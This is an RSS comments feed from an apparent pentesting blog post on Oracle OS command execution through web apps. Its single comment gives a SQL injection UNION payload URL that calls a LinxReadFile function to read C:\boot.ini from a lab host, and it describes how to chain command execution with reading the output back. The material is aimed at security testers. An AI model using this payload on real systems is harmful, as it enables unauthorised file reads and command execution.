<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Oracle O.S command execution through web apps</title>
	<atom:link href="http://www.notsosecure.com/folder2/2009/04/27/oracle-os-command-execution-through-web-apps/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.notsosecure.com/folder2/2009/04/27/oracle-os-command-execution-through-web-apps/</link>
	<description>From Pentesters To Pentesters</description>
	<lastBuildDate>Thu, 08 Jul 2010 02:17:27 +0100</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: sid</title>
		<link>http://www.notsosecure.com/folder2/2009/04/27/oracle-os-command-execution-through-web-apps/comment-page-1/#comment-84532</link>
		<dc:creator>sid</dc:creator>
		<pubDate>Mon, 27 Apr 2009 14:27:27 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=211#comment-84532</guid>
		<description>the text file also contains function to read files and you can get the output through  UNION query as:

http://192.168.172.129:81/ora2.php?name=1%20union%20all%20select%20sys.LinxReadFile(&#039;C:\boot.ini&#039;)%20from%20dual

So, execute command, pipe the output to a file and read it back via union.</description>
		<content:encoded><![CDATA[<p>the text file also contains function to read files and you can get the output through  UNION query as:</p>
<p><a href="http://192.168.172.129:81/ora2.php?name=1%20union%20all%20select%20sys.LinxReadFile(" rel="nofollow">http://192.168.172.129:81/ora2.php?name=1%20union%20all%20select%20sys.LinxReadFile(</a>&#8216;C:\boot.ini&#8217;)%20from%20dual</p>
<p>So, execute command, pipe the output to a file and read it back via union.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
